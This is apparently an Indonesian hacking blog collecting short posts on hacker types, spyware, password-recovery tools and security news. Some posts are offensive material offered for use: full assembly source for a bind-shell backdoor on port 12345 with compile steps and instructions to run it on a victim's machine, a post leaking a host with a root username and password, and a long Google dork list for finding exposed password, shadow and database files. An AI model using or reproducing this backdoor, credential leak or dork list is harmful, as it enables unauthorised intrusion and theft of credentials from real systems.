Pembagian para hacker berdasarkan profile kemampuan profesionalnya terbagi menjadi tujuh kelompok. Hal ini sebagaimana dijelaskan oleh Marc Rogers MA, seorang guru besar psikologi dari University of Manitoba Hawai, yakni:
  • Tool Kids/NewBies Orang-orang yang baru belajar aktivitas hacking, namun kemampuan kemampuan tentang komputer serta teknik pemrograman relatif terbatas dan hanya baru bisa membuat program-program dasar. Aktivitas hacking yang dilakukan, umumnya menggunakan bantuan aplikasi yang terdapat di internet hingga tidak murni mengandalkan kemampuan individunya.
  • Cyber Punk Orang-orang yang memiliki pengetahuan dan teknik komputer yang lebih tinggi dibandingkan NewBies. Mereka sudah mampu memahami karakteristik dari sistem jaringan ataupun sistem yang sedang mereka serang. Pengetahuan mereka tentang bahasa pemrograman cukup andal, karena mampu mendefinisikan hingga karakteristik umumnya. Dengan kemampuannya ini, ia sudah mampu menciptakan alat bantu infiltrasi sendiri, hingga tidak lagi menggunakan program-program bantu yang tersedia di internet. Aktivitas-aktivitas yang dilakukan memiliki kecenderungan untuk kriminal, seperti defacing web, carding, ataupun spamming.
  • Internals Orang-orang yang masih bergabung ataupun pernah (mantan) dengan perusahaan TI, dengan kemampuan komputer dan programming yang anda. Dan melakukan berbagai aktivitas hacking dengan mengandalkan berbagai kombinasi sumber daya internal maupun eksternal yang ada untuk berbagai tujuan. Contoh, pelanggaran paling sering dilakukan adalah breaking over priviledge activity, yakni segala aktivitas yang melanggar batasan-batasan hak yang dimiliki.
  • Coders Golongan ini dikenal juga sebagai resources, yakni orang-orang yang menjual berbagai informasi yang ada di internet ke pihak-pihak yang membutuhkan. Kemampuan programming dan teknisnya sangat andal dan kelompok ini malakukan berbagai aktivitas infiltrasi dalam rangka untuk memperoleh berbagai data ataupun informasi yang dapat dijual. Coders juga membantu membuat berbagai aplikasi bantu hacking yang dibutuhkan oleh para hacker ataupun attacker/cracker yang membutuhkan.
  • Old Guard Hackers (Idealism Gate Keepers) Para hacker sejati yang murni melakukan aktivitas-kativitas hacking dalam rangka untuk tujuan ilmiah dan kebaikan semua pihak. Jumlah golongan ini relatif sangat sedikit, karena idealisme yang dijunjung memaksa mereka untuk menggunakan kode etik yang dijunjung tinggi oleh para hacker, yakni kemampuan di atas segalanya.
  • Professional Criminals Para attacker/cracker yang bergerak atas nama kelompok ataupun individu dan melakukan berbagai aktivitas cyber crime sebagai sumber kehidupan utamanya. Kemampuan yang dimiliki oleh kelompok ini sangat sempurna karena mengombinasikan berbagai piranti keras dan pengetahuan programming yang bisa diandalkan dibantu data/informasi yang diperoleh dari Coders. Aktivitas kejahatan yang dilakukan tidak lagi dalam kelas cyber punk yang lebih banyak pada target individu, namun justru pada kalangan korporat dengan jalan merampok dana yang tersedia dengan melakukan transfer secara tersembunyi.
  • Cyber Terrorist Sekelompok orang atau individu yang bertindak atas dasar sentimen pada suatu kelompok atau pihak tertentu, dan melakukan berbagai aktivitas yang bertujuan untuk menunjukkan eksistensi mereka pada lingkungan dunia. Tingkatan kemampuan yang dimiliki kelompok ini adalah yang tertinggi karena menggabungkan berbagai sumber daya yang ada, level kemampuan, bahkan menggunakan sarana prasarana bantuan dari pihak sponsor yang membantu seperti satelit komunikasi.
Apapun alasannya ‘hacking’ adalah tindakan yang tidak melangar hukum, namun disebut “cracking” apabila digunakan untuk merusak, menghilangkan data / sesuatu yang bukan milik kita. Akan tetapi yang kita ketahui bersama – sama bahwa tidak adanya jaminan yang memastikan data atau informasi yang kita punya adalah 100 % aman dan kondisi inilah yang digunakan orang untuk memulai “pekerjaan” merusak dari awalnya iseng hingga professional. Hal terpenting yang bisa kita lakukan adalah menutup segala kemungkinan celah keamanan yang terbuka dan selalu mengupdate data / informasi [ siaga ].
[ How About You ? What Type Of Hacker You Want ? Ready To Hack? ]
Oke – Apakah lu dah siap untuk gabung jadi Hacker Indonesia ?? Ato lu mundur??
Hehehehhe.. Mari kita kibarkan Bendera Merah Putih Indonesia di Dunia Cyber!!
We are Indonesian Hacker ( Kami adalah Hacker Indonesia )
Yang Menjunjung Tinggi Pancasila dan Bhinneka Tunggal Ika :D
Please Support Indonesia Hacker atau Hacker Indonesia atau Indonesian Hacker!
Viva Hacker Indonesia – Maju Terus Indonesia Hacker
READMORE
 

Tools Remote PC target

xixixixiixix lagi perdalam php nah ak googling aja tentang php my admin
dan ternyata ga sengaja masuk k tempat tutorial cara meremote pc target pake tools
dari pada mubazir mendingan di share aja deh ^_^

DOWNLOAD DI SINI …. http://www.4shared.com/file/15982157...2f/remote.html

emmmmm ak jelasin dikit ya jalan kerjanya
jd itu km download trs km install
bis di install nanti masukin deh user name pass ( ga tau lagi) kalo ga tau liat di shell target kalian
liat di bagian config.php
bisa kan
ok di sini ak kasih contoh target nya ^_^
target nya si ak di kasih sama om marahmerah host= tep.um.ac.id
user=root
pass=teplocal123
READMORE
 

Mengenal Spyware



Spyware merupakan program yang dibuat dengan tujuan untuk memata-matai (spy). Spyware bukanlah suatu ancaman biasa, namun bisa jadi sangat berbahaya karena sesuai dengan namanya, spyware sangat mengancam privasi dan bisa menurunkan kinerja suatu system & jaringan

Spyware telah merajalela sejak tahun 1994. Saat itu, SPYWARE yang cukup terkenal digunakan adalah Gator. Spyware ini masih exist sampai saat ini. Sejalan dengan perkembangan teknologi, semulanya spyware ditujukan untuk bisnis periklanan. Namun kini semua telah berubah, spyrware digunakan unuk tujuan destructive.

Kategori Spyware

SPYWARE memiliki beberapa kategori, yaitu:

1. Trojan / backdoor

2. Adware

3. Keylogger

4. DDoS agent (zombie)

5. Sniffer, password cracker

6. Browser Helper Object

7. P2P contohnya kazaa.

8. RAT – Remote Access Tool/Trojan.

Kalau kita lihat ada yang overlapping dengan solusi anti-virus yaitu di bagian trojan. Solusi anti-virus umumnya bisa mendeteksi keberadaan trojan di dalam sistem kita. Namun untuk kategori lain seperti adware, P2P, hacker tools, umumnya anti virus tidak memasukkan kategori ini di dalam deteksi mereka.

Lalu kenapa tool seperti sniffer digolongkan ke dalam spyware? Ada alasan di belakangnya. Sebagaimana kita ketahui bahwa tool sniffer bisa mempunyai dua sisi yaitu sisi yang baik atau berguna bagi administrator.

Sniffer bisa digunakan oleh administrator untuk melakukan ‘tracing’ atau analisa paket di jaringan mereka. Network Load utility yang untuk mengetahui kapasitas bandwidth juga menggunakan teknologi sniffer. Tool IDS – Intrusion Detection System yang berbasis network juga menggunakan teknologi sniffer untuk mendeteksi adanya intrusion di satu jaringan.

Namun di sisi lain ternyata sniffer bisa digunakan untuk tujuan yang tidak baik misalnya untuk sniffing user-id dan password yang digunakan di suatu jaringan. Sehingga apabila sistem authentication yang ada tidak menggunakan enkripsi untuk password dan user-id atau berupa ‘plain-text’ maka sniffer dapat dengan mudah melihat user-id dan password tersebut.

Selain itu ada kategori spyware yang orang dengan senang hati untuk meng-installnya yaitu P2P – Point to Point software seperti contohnya adalah Kazaa – P2P untuk sharing file yang sangat populer. Di dalam Kazaa ini banyak sekali terdapat adware – software iklan – karena di situlah mereka mendapatkan profit. Kategori ini yang dimasukkan ke dalam ‘user awareness installation’ artinya user yang melakukan atau trigger instalasi sendiri bukan via embedded installation misalnya saat lakukan download atau akses ke Internet.

Untuk itu, WASPADALAH...!!!! :-)
 
READMORE
 

ChromePasswordDecryptor 1.6 – Cooler than Earlier





ChromePasswordDecryptor, the free tool to recover web sign-on secrets (username/passwords) stored by Google Chrome is now looks even better with cooler interface.  New version comes the buttons with image icons which enhances over all look & feel as shown in the screen shot below.


Also it provides additional export option to save the recovered password list to TEXT file.
For more information about how it works and to download, visit the ChromePasswordDecryptor home page.
READMORE
 

Devilzc0de.asm bindshell backdoor port 12345





 


yoyoparty.com/upload/asm.png
download: http://yoyoparty....lzc0de.asm

Ok new tool made by devilzc0de.org for backdooring your victim @ port 12345
Source of devilzc0de.asm:



;devilzc0de port bind shell @ port 12345
;c0d3r: mywisdom
;special thanks: gunslinger,
;flyv666,kiddies,petimati,devil
;nongkong,whitehat,marco poppies,
;v3n0m,c0mrade, and all my friend

global _start

_start:

 push byte 2   
 pop eax       
 int 80h 
 jmp soket

setresuid:       
BITS 32
xor eax, eax   ;reset eax
xor ebx, ebx 
xor ecx, ecx 
cdq
mov BYTE al, 0xa4
int 80h

setreuid:
mov ebx, eax
mov ecx, eax
push byte 70
pop eax
int 80h

soket:
push   byte   0  ; simpan 0 ke stak
push   byte   1  ; simpan 1 ke stak
push   byte   2 ; simpan 2 ke stak

mov    eax, 102 ;syscall nomor 102 register ax
mov    ebx, 1
mov    ecx, esp ; pointer ke stak
int    80h

mov    edx,    eax

binder:

;simpan semua argumen yang diperlukan ke stack

push   byte 0     
push   byte 0
push   byte 0
push   word 0x3930
push   word 2
mov   ebx, esp

push    byte 16
push   ebx
push   edx

mov   eax,102 ;persiapan socket call
mov   ebx,2 
mov   ecx,esp
int    80h

lisen:
push   byte   0x1
push   edx
mov   eax,102
mov   ebx,4
mov   ecx,esp
int    80h

acep:
push   byte 0
push   byte 0
push   edx
mov   eax,102
mov   ebx,5
mov   ecx,esp
int    80h

mov   edx, eax

siap_fd:
mov   eax,63
mov   ebx,edx
mov    ebx,2
int   80h

mov     eax,63
mov     ebx,edx
mov     ecx,1
int     80h

mov     eax,63
mov     ebx,edx
mov     ecx,0
int     80h

eksekusi:

push BYTE 11
pop eax
push ecx
push 0x68732f2f
push 0x6e69622f
mov ebx, esp
push ecx
mov edx, esp
push ebx
mov ecx, esp
int 80h

bersih2:
push byte 0x06
pop eax
int 80h

keluar:
push    byte 0x01
pop   eax
int    80h


Download source  Code


Compile:
[code]
nasm -f elf devilzc0de.asm
ld -o devilzc0de devilzc0de.o




Run in background @ your victim:
[code]
./devilzc0de &
READMORE
 

Dork Dok-dok-dok...Google!!

inurl:"ViewerFrame?Mode="
intitle:axis intitle:"video server"
inurl:indexFrame.shtml Axis
?intitle:index.of? mp3 artist-name-here
"intitle:index of"
"A syntax error has occurred" filetype:ihtml
"access denied for user" "using password"
"Chatologica MetaSearch" "stack tracking:"
"Index of /backup"
"ORA-00921: unexpected end of SQL command"
"parent directory " /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory "Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
?intitle:index.of? mp3 name
allintitle:"Network Camera NetworkCamera"
allinurl: admin mdb
allinurl:auth_user_file.txt
intitle:"live view" intitle:axis
intitle:axis intitle:"video server"
intitle:liveapplet
inurl:"ViewerFrame?Mode="
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG)
inurl:passlist.txt
inurl:view/index.shtml
inurl:view/indexFrame.shtml
inurl:view/view.shtml
inurl:ViewerFrame?Mode=Refresh
liveapplet
!Host=*.* intext:enc_UserPassword=* ext:pcf
" -FrontPage-" ext:pwd inurl:(service | authors | administrators | users)
"A syntax error has occurred" filetype:ihtml
"About Mac OS Personal Web Sharing"
"access denied for user" "using password"
"allow_call_time_pass_reference" "PATH_INFO"
"An illegal character has been found in the statement" -"previous message"
"ASP.NET_SessionId" "data source="
"AutoCreate=TRUE password=*"
"Can't connect to local" intitle:warning
"Certificate Practice Statement" inurl:(PDF | DOC)
"Chatologica MetaSearch" "stack tracking"
"Copyright © Tektronix, Inc." "printer status"
"detected an internal error [IBM][CLI Driver][DB2/6000]"
"Dumping data for table"
"Error Diagnostic Information" intitle:"Error Occurred While"
"error found handling the request" cocoon filetype:xml
"Fatal error: Call to undefined function" -reply -the -next
"Generated by phpSystem"
"generated by wwwstat"
"Host Vulnerability Summary Report"
"HTTP_FROM=googlebot" googlebot.com "Server_Software="
"IMail Server Web Messaging" intitle:login
"Incorrect syntax near"
"Index of /" +.htaccess
"Index of /" +passwd
"Index of /" +password.txt
"Index of /admin"
"Index of /mail"
"Index Of /network" "last modified"
"Index of /password"
"index of /private" site:mil
"index of /private" -site:net -site:com -site:org
"Index of" / "chat/logs"
"index of/" "ws_ftp.ini" "parent directory"
"Installed Objects Scanner" inurl:default.asp
"Internal Server Error" "server at"
"liveice configuration file" ext:cfg
"Login - Sun Cobalt RaQ"
"Mecury Version" "Infastructure Group"
"Microsoft ® Windows * ™ Version * DrWtsn32 Copyright ©" ext:log
"More Info about MetaCart Free"
"Most Submitted Forms and Scripts" "this section"
"mysql dump" filetype:sql
"mySQL error with query"
"Network Vulnerability Assessment Report"
"not for distribution" confidential
"ORA-00921: unexpected end of SQL command"
"ORA-00933: SQL command not properly ended"
"ORA-00936: missing expression"
"pcANYWHERE EXPRESS Java Client"
"phone * * *" "address *" "e-mail" intitle:"curriculum vitae"
"phpMyAdmin MySQL-Dump" "INSERT INTO" -"the"
"phpMyAdmin MySQL-Dump" filetype:txt
"phpMyAdmin" "running on" inurl:"main.php"
"PostgreSQL query failed: ERROR: parser: parse error"
"Powered by mnoGoSearch - free web search engine software"
"powered by openbsd" +"powered by apache"
"Powered by UebiMiau" -site:sourceforge.net
"produced by getstats"
"Request Details" "Control Tree" "Server Variables"
"robots.txt" "Disallow:" filetype:txt
"Running in Child mode"
"sets mode: +k"
"sets mode: +p"
"sets mode: +s"
"Supplied argument is not a valid MySQL result resource"
"Supplied argument is not a valid PostgreSQL result"
"Thank you for your order" +receipt
"This is a Shareaza Node"
"This report was generated by WebLog"
"This summary was generated by wwwstat"
"VNC Desktop" inurl:5800
"Warning: Cannot modify header information - headers already sent"
"Web File Browser" "Use regular expression"
"xampp/phpinfo
"You have an error in your SQL syntax near"
"Your password is * Remember this for later use"
aboutprinter.shtml
allintitle: "index of/admin"
allintitle: "index of/root"
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov
allintitle: sensitive filetype:doc
allintitle:.."Test page for Apache Installation.."
allintitle:admin.php
allinurl:".r{}_vti_cnf/"
allinurl:admin mdb
allinurl:auth_user_file.txt
allinurl:servlet/SnoopServlet
An unexpected token "END-OF-STATEMENT" was found
camera linksys inurl:main.cgi
Canon Webview netcams
Comersus.mdb database
confidential site:mil
ConnectionTest.java filetype:html
data filetype:mdb -site:gov -site:mil
eggdrop filetype:user user
ext:conf NoCatAuth -cvs
ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-"
ext:txt inurl:unattend.txt
filetype:ASP ASP
filetype:ASPX ASPX
filetype:BML BML
filetype:cfg ks intext:rootpw -sample -test -howto
filetype:cfm "cfapplication name" password
filetype:CFM CFM
filetype:CGI CGI
filetype:conf inurl:psybnc.conf "USER.PASS="
filetype:dat "password.dat
filetype:DIFF DIFF
filetype:DLL DLL
filetype:DOC DOC
filetype:FCGI FCGI
filetype:HTM HTM
filetype:HTML HTML
filetype:inf sysprep
filetype:JHTML JHTML
filetype:JSP JSP
filetype:log inurl:password.log
filetype:MV MV
filetype:pdf "Assessment Report" nessus
filetype:PDF PDF
filetype:PHP PHP
filetype:PHP3 PHP3
filetype:PHP4 PHP4
filetype:PHTML PHTML
filetype:PL PL
filetype:PPT PPT
filetype:PS PS
filetype:SHTML SHTML
filetype:STM STM
filetype:SWF SWF
filetype:TXT TXT
filetype:XLS XLS
htpasswd / htpasswd.bak
Index of phpMyAdmin
index of: intext:Gallery in Configuration mode
index.of passlist
intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board"
intext:"d.aspx?id" || inurl:"d.aspx?id"
intext:"enable secret 5 $"
intext:"powered by Web Wiz Journal"
intext:"SteamUserPassphrase=" intext:"SteamAppUser=" -"username" -"user"
intitle:"--- VIDEO WEB SERVER ---" intext:"Video Web Server" "Any time & Any where" username password
intitle:"500 Internal Server Error" "server at"
intitle:"actiontec" main setup status "Copyright 2001 Actiontec Electronics Inc"
intitle:"Browser Launch Page"
intitle:"DocuShare" inurl:"docushare/dsweb/" -faq -gov -edu
intitle:"EverFocus.EDSR.applet"
intitle:"Index of" ".htpasswd" "htgroup" -intitle:"dist" -apache -htpasswd.c
intitle:"Index of" .bash_history
intitle:"Index of" .mysql_history
intitle:"Index of" .mysql_history
intitle:"Index of" .sh_history
intitle:"Index of" cfide
intitle:"index of" etc/shadow
intitle:"index of" htpasswd
intitle:"index of" intext:globals.inc
intitle:"index of" master.passwd
intitle:"index of" members OR accounts
intitle:"index of" passwd
intitle:"Index of" passwords modified
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"Index of" pwd.db
intitle:"index of" spwd
intitle:"Index of" spwd.db passwd -pam.conf
intitle:"index of" user_carts OR user_cart
intitle:"Index of..etc" passwd
intitle:"iVISTA.Main.Page"
intitle:"network administration" inurl:"nic"
intitle:"OfficeConnect Cable/DSL Gateway" intext:"Checking your browser"
intitle:"remote assessment" OpenAanval Console
intitle:"Remote Desktop Web Connection" inurl:tsweb
intitle:"switch login" "IBM Fast Ethernet Desktop"
intitle:"SWW link" "Please wait....."
intitle:"teamspeak server-administration
intitle:"TUTOS Login"
intitle:"VMware Management Interface:" inurl:"vmware/en/"
intitle:"Welcome to the Advanced Extranet Server, ADVX!"
intitle:"Welcome to Windows 2000 Internet Services"
intitle:"Connection Status" intext:"Current login"
intitle:"inc. vpn 3000 concentrator"
intitle:asterisk.management.portal web-access
intitle:dupics inurl:(add.asp | default.asp | view.asp | voting.asp) -site:duware.com
intitle:index.of administrators.pwd
intitle:index.of cgiirc.config
intitle:Index.of etc shadow site:passwd
intitle:index.of intext:"secring.skr"|"secring.pgp"|"secring.bak"
intitle:index.of master.passwd
intitle:index.of passwd passwd.bak
intitle:index.of people.lst
intitle:index.of trillian.ini
intitle:Novell intitle:WebAccess "Copyright *-* Novell, Inc"
intitle:opengroupware.org "resistance is obsolete" "Report Bugs" "Username" "password"
intitle:open-xchange inurl:login.pl
inurl:":10000" intext:webmin
inurl:"8003/Display?what="
inurl:"auth_user_file.txt"
inurl:"GRC.DAT" intext:"password"
inurl:"printer/main.html" intext:"settings"
inurl:"slapd.conf" intext:"credentials" -manpage -"Manual Page" -man: -sample
inurl:"slapd.conf" intext:"rootpw" -manpage -"Manual Page" -man: -sample
inurl:"ViewerFrame?Mode="
inurl:"wvdial.conf" intext:"password"
inurl:"wwwroot/
inurl:/Citrix/Nfuse17/
inurl:/db/main.mdb
inurl:/wwwboard
inurl:access
inurl:admin filetype:db
inurl:asp
inurl:buy
inurl:ccbill filetype:log
inurl:cgi
inurl:cgiirc.config
inurl:config.php dbuname dbpass
inurl:data
inurl:default.asp intitle:"WebCommander"
inurl:download
inurl:file
inurl:filezilla.xml -cvs
inurl:forum
inurl:home
inurl:hp/device/this.LCDispatcher
inurl:html
inurl:iisadmin
inurl:inc
inurl:info
inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man
inurl:list
inurl:login filetype:swf swf
inurl:mail
inurl:midicart.mdb
inurl:names.nsf?opendatabase
inurl:new
inurl:nuke filetype:sql
inurl:order
inurl:ospfd.conf intext:password -sample -test -tutorial -download
inurl:pages
inurl:pap-secrets -cvs
inurl:passlist.txt
Ultima Online loginservers
inurl:Proxy.txt
inurl:public
inurl:search
inurl:secring ext:skr | ext:pgp | ext:bak
inurl:shop
inurl:shopdbtest.asp
inurl:software
inurl:support
inurl:user
inurl:vtund.conf intext:pass -cvs s
inurl:web
inurl:zebra.conf intext:password -sample -test -tutorial -download
LeapFTP intitle:"index.of./" sites.ini modified
POWERED BY HIT JAMMER 1.0!
signin filetype:url
site:ups.com intitle:"Ups Package tracking" intext:"1Z ### ### ## #### ### #"
top secret site:mil
Ultima Online loginservers
VP-ASP Shop Administrators only
XAMPP "inurl:xampp/index"

From : http://yogyacarderlink.web.id/forum/viewthread.php?thread_id=1557
READMORE
 

GooglePasswordDecryptor – The Google Account Password Recovery Tool

Finally stars got aligned perfectly for the release of the new tool, GooglePasswordDecryptor. It is the free tool to recover the stored Google account passwords by various desktop applications.
Currently it supports Google password recovery from following applications..
  • Google Talk
  • Google Picassa
  • Google Desktop Seach
  • Gmail Notifier
  • Internet Explorer ( all versions from 4 to 8 )
  • Google Chrome
Each of the above mentioned applications use their own encrypted format and storage location to securely store the Google account password. These encryption techniques and steps to decrypt the password for each of these applications are illustrated in the following research article, ‘Exposing the Google Password Secrets’
For more information and to download the GooglePasswordDecryptor, visit the main page here...
READMORE
 

Operation Aurora – Google Got Hacked through IE Zero Day

Operation Aurora – The well targeted attack under which top companies including Google got hacked through the zero day vulnerability. Google has released separate statement recently illustrating nature of the attack vectors and motives of the attacker.
In this attack which believed to be originated from China, the zero day (not publicly known) vulnerability in Internet Explorer was used. The attacker sent the social engineered emails to couple of individuals in the company prompting them to open malicious website. Once the user has visited the malicious content, it opened reverse TCP connection to the attacker’s machine leading to complete take over of the victim’s system. Attacker then used this connection to further compromise the corporate boundaries and gather confidential data. Similar attack was against other corporate leading to breach of confidential information.
On Friday, Microsoft has released separate advisory confirming this zero day vulnerability in Internet Explorer. Though there is no patch against it, there are couple of factors such as DEP, IE Protected mode, restricted mode which mitigates this attack to certain extent.
Here is the video demonstration created by Nishant showing this zero day attack even on the fully patched machine with Norton 2010 protection


With no protection and availability of ready to launch exploit code on Metasploit, there will be more successful attacks on the cards.

With employees at Google coming under such a social engineered attack,  only God can save the common people
READMORE
 

Google Offer Rewards for Chrome Hackers

Here comes the Google’s turn to offer bounty for hackers finding bugs in Chrome. As per the latest post “Encouraging More Chromium Security Research” on its official blog of Chrome,  Google has decided to follow the practice of Microsoft and other organizations to reward the security researchers.
For every Security vulnerability found in Chrome,  Google will be offering cash reward of $500 and  if that bug turns out to be critical then it can go upto $1337 (magic number ;) ).  Even more, Google is willing to offer permanent position for security researcher in its Mountain View office at CA.
This is wise step from Google to get the attention of security researchers and make them work for its products.

However I wonder when third party organizations such as iDefense, Tipping Point offering bigger bounties for hackers why some one will settle for mere $500 …!
READMORE
 

Social Engineering Made Easy by SET

“Man without tools is animal and with tools he is everything”. Till today the quote applies to every field man has set his footprints in. Man has created tools for everything to make every small job easier & quicker.
Now we have tool for Social Engineering too. This new tool is called Social-Engineering Toolkit (in short SET) which aims to automate the social engineering attacks through mass email & web attacks. Within few steps attacker will be able to launch smart attacks with high chance of success. SET works on top of Metasploit, a popular penetration testing framework, using its exploit payloads and launch pad.
To demonstrate its effectiveness, Nishant has created this video which shows how easy it is to launch such social engineering attack with high returns





In this video, attacker sends the emails to victims using SET tool which contains vulnerable PDF attachment and tiny URL pointing to malicious link. So once victim opens up this PDF document, it automatically connects back to attacker’s machine giving full access to the victim’s system. If victim is lazy enough to open PDF document (as he is human being too ), he will be curious to open malicious URL which is obscured by tiny URL leading to successful attack.
At the end of the day, there is always a Zero Day because of Human Stupidity…!
READMORE
 

Discovering Hidden Registry Keys in Windows

Windows uses registry to store every user and policy configuration on the system. One can directly tweak anything in the registry to alter any of the  system settings. However not all registry keys are visible when viewed through default registry editor (regedit.exe).  Especially some of the security and core system related keys are hidden from user. Even administrator cannot see these special keys.
Here are some of the such hidden registry keys
HKEY_LOCAL_MACHINE\SECURITY
HKEY_LOCAL_MACHINE\SAM
SECURITY registry key stores all the system policy and LSA secrets related information.  SAM registry key has details for user accounts along with LM/NTLM password hashes for each user.
There are many ways we can view these hidden registry keys. We can use psexec.exe tool (part of pstools package from sysinternals) to launch the regedit.exe as system account as shown below.
psexec.exe -s -i regedit.exe
Here is the screenshot showing the hidden SAM accounts through registry editor running under system account.
Another way to view these hidden keys is through IceSword, the antirootkit tool.  This beautiful tool comes with powerful registry editor using which all these hidden registry keys can be discovered easily.
Here is the screenshot below which shows Security registry key through IceSword.
READMORE
 

Sniffing VoIP Calls Using UCSniff

Sniffing the neighbor’s passwords on the network was an age old stuff and every hacker would have done it at some point of time using tools such as Dsniff, cain & abel etc. Now you can record and listen to your neighbor’s  phone calls too using the tool called UCSniff. Not just calls, you can even view the video conversations done through IP Video.
UCSniff is a VoIP & IP Video Security Assessment tool that integrates existing open source software into several useful features, allowing VoIP and IP Video owners and security professionals to rapidly test for the threat of unauthorized VoIP and Video Eavesdropping.
Here is the video demonstration created by Nishant, the security researcher which illustrates how any one on the network can easily sniff your VoIP/Video conversations transparently.



UCSniff supports wide range of popular protocols and can be run on multiple platforms including Windows & Linux.
So next time when your manager says pissa pissa on the phone, you know what he is upto…!
READMORE
 

Open Source Wireless Hacking

AirFart is a wireless tool created to detect wireless devices, calculate their signal strengths, and present them to the user in an easy-to-understand fashion. It is written in C/C++ with a GTK front end. Airfart supports all wireless network cards supported by the linux-wlan-ng Prism2 driver that provide hardware signal strength information in the "raw signal" format (ssi_type 3). Airfart implements a modular n-tier architecture with the data collection at the bottom tier and a graphical user interface at the top.
image
WifiScanner is a tool that has been designed to discover wireless node (i.e access point and wireless clients). It is distributed under the GPL License.
It work with CISCO® card and prism card with hostap driver or wlan-ng driver, prism54g, Hermes/Orinoco, Atheros, Centrino, …
An IDS system is integrated to detect anomaly like MAC usurpation.
image
READMORE
 

Finding Website Vulnerabilities

SiteDigger searches Google’s cache to look for vulnerabilities, errors, configuration issues, proprietary information, and interesting security nuggets on web sites.
  • The tool requires Google web services API license key. Browse to http://www.google.com/apis/ and follow the instructions to get the license key.
  • Provide the license key at the bottom-right box on the tool.
  • Enter the domain / sub-domain information. (.mil, nasa.gov, usc.edu, etc).
  • Select search categories using signature tab.
  • Hit the search button. Use the export results button to view the results in tabular format.
READMORE
 

Assembler Debugger for Windows

OllyDbg is a 32-bit assembler level analysing debugger for Microsoft® Windows®. Emphasis on binary code analysis makes it particularly useful in cases where source is unavailable. OllyDbg is a shareware, but you can download and use it for free. Special highlights are:
  • Intuitive user interface, no cryptical commands
  • Code analysis - traces registers, recognizes procedures, loops, API calls, switches, tables, constants and strings
  • Directly loads and debugs DLLs
  • Object file scanning - locates routines from object files and libraries
  • Allows for user-defined labels, comments and function descriptions
  • Understands debugging information in Borland® format
  • Saves patches between sessions, writes them back to executable file and updates fixups
  • Open architecture - many third-party plugins are available
  • No installation - no trash in registry or system directories
  • Debugs multithread applications
  • Attaches to running programs
  • Configurable disassembler, supports both MASM and IDEAL formats
  • MMX, 3DNow! and SSE data types and instructions, including Athlon extensions
  • Full UNICODE support
  • Dynamically recognizes ASCII and UNICODE strings - also in Delphi format!
  • Recognizes complex code constructs, like call to jump to procedure
  • Decodes calls to more than 1900 standard API and 400 C functions
  • Gives context-sensitive help on API functions from external help file
  • Sets conditional, logging, memory and hardware breakpoints
  • Traces program execution, logs arguments of known functions
  • Shows fixups
  • Dynamically traces stack frames
  • Searches for imprecise commands and masked binary sequences
  • Searches whole allocated memory
  • Finds references to constant or address range
  • Examines and modifies memory, sets breakpoints and pauses program on-the-fly
  • Assembles commands into the shortest binary form
  • Starts from the floppy disk
READMORE